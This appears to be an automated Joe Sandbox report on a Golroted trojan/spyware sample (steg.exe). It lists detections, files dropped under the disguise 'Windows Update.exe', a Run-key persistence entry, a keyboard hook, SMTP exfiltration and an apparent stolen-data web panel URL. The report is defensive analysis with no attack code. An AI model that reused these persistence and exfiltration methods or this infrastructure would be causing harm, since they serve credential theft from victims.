                                Remote Access Software                                		SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                                DLL Side-Loading                                		LSA Secrets1
                                Process Discovery                                		SSHKeyloggingData Transfer Size Limits3
                                Non-Application Layer Protocol                                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.commonRc.common1
                                Masquerading                                		Cached Domain Credentials41
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureExfiltration Over C2 Channel14
                                Application Layer Protocol                                		Jamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items41
                                Virtualization/Sandbox Evasion                                		DCSync1
                                Remote System Discovery                                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                                Access Token Manipulation                                		Proc Filesystem11
                                System Network Configuration Discovery                                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)12
                                Process Injection                                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                                Hidden Files and Directories                                		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 593806 Sample: steg.exe Startdate: 22/03/2022 Architecture: WINDOWS Score: 100 44 Antivirus detection for dropped file 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 13 other signatures 2->50 7 steg.exe 7 2->7         started        10 WindowsUpdate.exe 7 2->10         started        process3 file4 24 C:\Users\user\AppData\...\Windows Update.exe, PE32 7->24 dropped 26 C:\...\Windows Update.exe:Zone.Identifier, ASCII 7->26 dropped 28 C:\Users\user\AppData\Local\...\steg.exe.log, ASCII 7->28 dropped 13 Windows Update.exe 16 8 7->13         started        30 C:\Users\user\...\WindowsUpdate.exe.log, ASCII 10->30 dropped 52 Antivirus detection for dropped file 10->52 54 Multi AV Scanner detection for dropped file 10->54 56 Machine Learning detection for dropped file 10->56 18 Windows Update.exe 8 10->18         started        signatures5 process6 dnsIp7 36 smtp.gmail.com 108.177.127.109, 49771, 49780, 587 GOOGLEUS United States 13->36 38 whatismyipaddress.com 104.16.155.36, 443, 49769, 49770 CLOUDFLARENETUS United States 13->38 42 2 other IPs or domains 13->42 32 C:\Users\user\AppData\...\WindowsUpdate.exe, PE32 13->32 dropped 34 C:\...\WindowsUpdate.exe:Zone.Identifier, ASCII 13->34 dropped 58 Changes the view of files in windows explorer (hidden files and folders) 13->58 60 Installs a global keyboard hook 13->60 20 dw20.exe 22 6 13->20         started        40 140.244.14.0.in-addr.arpa 18->40 22 dw20.exe 18->22         started        file8 signatures9 process10

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                steg.exe71%VirustotalBrowse
                                steg.exe88%ReversingLabsByteCode-MSIL.Trojan.Golroted
                                steg.exe100%AviraTR/Golroted.xous
                                steg.exe100%AviraTR/Spy.Gen
                                steg.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%AviraTR/Golroted.xous
                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%AviraTR/Spy.Gen
                                C:\Users\user\AppData\Roaming\Windows Update.exe100%AviraTR/Golroted.xous
                                C:\Users\user\AppData\Roaming\Windows Update.exe100%AviraTR/Spy.Gen
                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Windows Update.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Windows Update.exe88%ReversingLabsByteCode-MSIL.Trojan.Golroted
                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe88%ReversingLabsByteCode-MSIL.Trojan.Golroted

                                Unpacked PE Files

                                SourceDetectionScannerLabelLinkDownload
                                12.0.WindowsUpdate.exe.2c0000.0.unpack100%AviraTR/Golroted.xousDownload File
                                12.0.WindowsUpdate.exe.2c0000.0.unpack100%AviraTR/Spy.GenDownload File
                                12.2.WindowsUpdate.exe.2c0000.0.unpack100%AviraTR/Golroted.xousDownload File
                                12.2.WindowsUpdate.exe.2c0000.0.unpack100%AviraTR/Spy.GenDownload File
                                14.2.Windows Update.exe.ac0000.0.unpack100%AviraTR/Golroted.xousDownload File
                                14.2.Windows Update.exe.ac0000.0.unpack100%AviraTR/Spy.GenDownload File
                                14.0.Windows Update.exe.ac0000.0.unpack100%AviraTR/Golroted.xousDownload File
                                14.0.Windows Update.exe.ac0000.0.unpack100%AviraTR/Spy.GenDownload File
                                4.0.Windows Update.exe.10000.9.unpack100%AviraTR/Golroted.xousDownload File
                                4.0.Windows Update.exe.10000.9.unpack100%AviraTR/Spy.GenDownload File
                                0.0.steg.exe.f80000.0.unpack100%AviraTR/Golroted.xousDownload File
                                0.0.steg.exe.f80000.0.unpack100%AviraTR/Spy.GenDownload File
                                4.0.Windows Update.exe.10000.6.unpack100%AviraTR/Golroted.xousDownload File
                                4.0.Windows Update.exe.10000.6.unpack100%AviraTR/Spy.GenDownload File
                                4.0.Windows Update.exe.10000.0.unpack100%AviraTR/Golroted.xousDownload File
                                4.0.Windows Update.exe.10000.0.unpack100%AviraTR/Spy.GenDownload File
                                14.0.Windows Update.exe.ac0000.9.unpack100%AviraTR/Golroted.xousDownload File
                                14.0.Windows Update.exe.ac0000.9.unpack100%AviraTR/Spy.GenDownload File
                                14.0.Windows Update.exe.ac0000.3.unpack100%AviraTR/Golroted.xousDownload File
                                14.0.Windows Update.exe.ac0000.3.unpack100%AviraTR/Spy.GenDownload File
                                4.0.Windows Update.exe.10000.3.unpack100%AviraTR/Golroted.xousDownload File
                                4.0.Windows Update.exe.10000.3.unpack100%AviraTR/Spy.GenDownload File
                                14.0.Windows Update.exe.ac0000.6.unpack100%AviraTR/Golroted.xousDownload File
                                14.0.Windows Update.exe.ac0000.6.unpack100%AviraTR/Spy.GenDownload File
                                0.2.steg.exe.f80000.0.unpack100%AviraTR/Golroted.xousDownload File
                                0.2.steg.exe.f80000.0.unpack100%AviraTR/Spy.GenDownload File
                                4.2.Windows Update.exe.10000.0.unpack100%AviraTR/Golroted.xousDownload File
                                4.2.Windows Update.exe.10000.0.unpack100%AviraTR/Spy.GenDownload File

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.sajatypeworks.coman0%Avira URL Cloudsafe
                                http://crl.pki.goog/gsr1/gsr1.crl0;0%URL Reputationsafe
                                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                                https://whatismyipaddress.comx&#q0%Avira URL Cloudsafe
                                http://www.tiro.com0%URL Reputationsafe
                                http://www.fontbureau.comceta0%URL Reputationsafe
                                http://www.goodfont.co.kr0%URL Reputationsafe
                                http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
                                http://www.sajatypeworks.com0%URL Reputationsafe
                                http://www.typography.netD0%URL Reputationsafe
                                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                                http://fontfabrik.com0%URL Reputationsafe
                                http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl00%URL Reputationsafe
                                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                                http://www.tiro.com-0%Avira URL Cloudsafe
                                http://www.sandoll.co.kr0%URL Reputationsafe
                                http://www.urwpp.deDPlease0%URL Reputationsafe
                                http://www.zhongyicts.com.cn0%URL Reputationsafe
                                http://www.sajatypeworks.come0%URL Reputationsafe
                                http://www.sakkal.com0%URL Reputationsafe
                                http://www.fontbureau.comF0%URL Reputationsafe
                                http://www.sajatypeworks.comr0%Avira URL Cloudsafe
                                http://whatismyipaddress.comx&#q0%Avira URL Cloudsafe
                                http://crl.pki.goog/gtsr1/gtsr1.crl0W0%URL Reputationsafe
                                http://pki.goog/gsr1/gsr1.crt020%URL Reputationsafe
                                https://pki.goog/repository/00%URL Reputationsafe
                                http://www.carterandcone.coml0%URL Reputationsafe
                                http://192.99.212.64/WebPanel/log.php?username=0%Avira URL Cloudsafe
                                http://www.founder.com.cn/cn0%URL Reputationsafe
                                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                                https://000001BB00000050.oeaccount0%Avira URL Cloudsafe
                                http://www.fontbureau.como0%URL Reputationsafe
                                http://pki.goog/repo/certs/gts1c3.der00%URL Reputationsafe
                                http://whatismyipaddress.comx&#qH0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                whatismyipaddress.com
                                		104.16.155.36
                                		truefalse
                                  		high
                                  smtp.gmail.com
                                  		108.177.127.109
                                  		truefalse
                                    		high
                                    140.244.14.0.in-addr.arpa
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://whatismyipaddress.com/false
                                        		high
                                        https://whatismyipaddress.com/false
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.fontbureau.com/designersGsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sajatypeworks.comansteg.exe, 00000000.00000003.238498642.0000000005B9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://crl.pki.goog/gsr1/gsr1.crl0;Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://accounts.google.com/serviceloginWindows Update.exefalse
                                              		high
                                              http://www.fontbureau.com/designers/?steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/bThesteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://whatismyipaddress.comx&#qWindows Update.exe, 00000004.00000002.302601416.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.fontbureau.com/designers?steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.tiro.comsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comcetasteg.exe, 00000000.00000002.282794330.0000000001727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designerssteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://my.screenname.aol.com/_cqr/login/login.pspWindows Update.exefalse
                                                      		high
                                                      http://www.goodfont.co.krsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.google.com/mail/?p=WantAuthErrorWindows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://pki.goog/repo/certs/gtsr1.der04Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://slashdot.org/bookmark.plWindows Update.exefalse
                                                          		high
                                                          http://www.sajatypeworks.comsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.typography.netDsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cn/cThesteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://fontfabrik.comsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://dyn.com/dns//steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drfalse
                                                            		high
                                                            http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://whatismyipaddress.com/-steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drfalse
                                                              		high
                                                              http://www.galapagosdesign.com/DPleasesteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.tiro.com-steg.exe, 00000000.00000003.243445751.0000000005B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://signin.ebay.com/ws/ebayisapi.dllWindows Update.exefalse
                                                                		high
                                                                https://login.yahoo.com/config/loginWindows Update.exefalse
                                                                  		high
                                                                  http://www.fonts.comsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.linkedin.com/Windows Update.exefalse
                                                                      		high
                                                                      http://www.sandoll.co.krsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://digg.comWindows Update.exefalse
                                                                        		high
                                                                        http://www.urwpp.deDPleasesteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.zhongyicts.com.cnsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.sajatypeworks.comesteg.exe, 00000000.00000003.238498642.0000000005B9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.sakkal.comsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://support.google.com/mail/?p=BadCredentialsWindows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.apache.org/licenses/LICENSE-2.0steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fontbureau.comsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://whatismyipaddress.comWindows Update.exe, 00000004.00000002.302601416.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.fontbureau.comFsteg.exe, 00000000.00000002.282794330.0000000001727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.sajatypeworks.comrsteg.exe, 00000000.00000003.238498642.0000000005B9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://dyn.com/dns/Windows Update.exefalse
                                                                                  		high
                                                                                  http://whatismyipaddress.comx&#qWindows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  http://www.reddit.com/loginWindows Update.exefalse
                                                                                    		high
                                                                                    http://crl.pki.goog/gtsr1/gtsr1.crl0WWindows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://whatismyipaddress.comWindows Update.exe, 00000004.00000002.301961765.000000000276D000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359319845.00000000033DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.stumbleupon.com/sign_up.phpWindows Update.exefalse
                                                                                        		high
                                                                                        http://pki.goog/gsr1/gsr1.crt02Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://twitter.com/Windows Update.exefalse
                                                                                          		high
                                                                                          https://pki.goog/repository/0Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.myspace.comWindows Update.exefalse
                                                                                            		high
                                                                                            http://www.carterandcone.comlsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://www.cloudflare.com/5xx-error-landingWindows Update.exe, 00000004.00000002.302601416.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://twitter.com/Windows Update.exefalse
                                                                                                		high
                                                                                                http://192.99.212.64/WebPanel/log.php?username=Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.founder.com.cn/cnsteg.exe, 00000000.00000003.243241778.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlsteg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://pinterest.com/login/Windows Update.exefalse
                                                                                                      		high
                                                                                                      https://www.amazon.com/ap/signin/190-9059340-4656153Windows Update.exefalse
                                                                                                        		high
                                                                                                        https://www.noip.com/Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drfalse
                                                                                                          		high
                                                                                                          http://www.jiyu-kobo.co.jp/steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://000001BB00000050.oeaccountsteg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.comosteg.exe, 00000000.00000002.282794330.0000000001727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.com/designers8steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.com/accounts/serviceloginWindows Update.exefalse
                                                                                                              		high
                                                                                                              https://www.amazon.com/gp/css/homepage.htmlWindows Update.exefalse
                                                                                                                		high
                                                                                                                http://pki.goog/repo/certs/gts1c3.der0Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://whatismyipaddress.comx&#qHWindows Update.exe, 00000004.00000002.301961765.000000000276D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		low
                                                                                                                https://myspace.comWindows Update.exefalse
                                                                                                                  		high

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  104.16.155.36
                                                                                                                  		whatismyipaddress.comUnited States
                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                  108.177.127.109
                                                                                                                  		smtp.gmail.comUnited States
                                                                                                                  		15169GOOGLEUSfalse

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  192.168.2.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                  Analysis ID:593806
                                                                                                                  Start date and time:2022-03-22 02:34:19 +01:00
                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                  Overall analysis duration:0h 13m 33s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Sample file name:steg.exe
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                  Number of analysed new started processes analysed:21
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • HDC enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@10/15@9/3
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 75%
                                                                                                                  HDC Information:
                                                                                                                  • Successful, ratio: 2.6% (good quality ratio 2.4%)
                                                                                                                  • Quality average: 57.9%
                                                                                                                  • Quality standard deviation: 28.3%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 190
                                                                                                                  • Number of non-executed functions: 176
                                                                                                                  Cookbook Comments:
                                                                                                                  • Adjust boot time
                                                                                                                  • Enable AMSI
                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.189.173.20
                                                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                                                                                                                  • Execution Graph export aborted for target Windows Update.exe, PID 7000 because there are no executed function
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  03:35:50API Interceptor24x Sleep call for process: Windows Update.exe modified
                                                                                                                  03:35:53API Interceptor2x Sleep call for process: dw20.exe modified
                                                                                                                  03:35:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                                                  03:36:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  No context

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASNs

                                                                                                                  No context

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

